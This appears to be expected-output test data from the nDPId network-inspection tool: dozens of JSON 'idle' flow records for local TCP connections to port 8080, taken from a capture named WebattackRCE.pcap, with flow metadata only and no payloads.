00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7580000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":263,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277078,"flow_last_seen":1576420277078,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50070,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":264,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277079,"flow_last_seen":1576420277079,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50072,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277081,"flow_last_seen":1576420277081,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50074,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":266,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277083,"flow_last_seen":1576420277083,"flow_idle_time":7580000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50076,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":267,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277084,"flow_last_seen":1576420277084,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50078,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":268,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277086,"flow_last_seen":1576420277086,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50080,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":269,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277087,"flow_last_seen":1576420277087,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50082,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":270,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277089,"flow_last_seen":1576420277089,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50084,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":271,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277090,"flow_last_seen":1576420277090,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50086,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":272,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277091,"flow_last_seen":1576420277091,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50088,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":273,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277093,"flow_last_seen":1576420277093,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50090,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":274,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277094,"flow_last_seen":1576420277094,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50092,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":275,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277096,"flow_last_seen":1576420277096,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50094,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":276,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277098,"flow_last_seen":1576420277098,"flow_idle_time":7580000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50096,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":277,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277100,"flow_last_seen":1576420277100,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50098,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":278,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277106,"flow_last_seen":1576420277106,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50100,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":279,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277109,"flow_last_seen":1576420277109,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50102,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":280,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277113,"flow_last_seen":1576420277113,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50104,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":281,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277115,"flow_last_seen":1576420277115,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50106,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":282,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277116,"flow_last_seen":1576420277116,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50108,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":283,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277118,"flow_last_seen":1576420277118,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50110,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277119,"flow_last_seen":1576420277119,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50112,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00592{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":285,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277121,"flow_last_seen":1576420277121,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50114,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
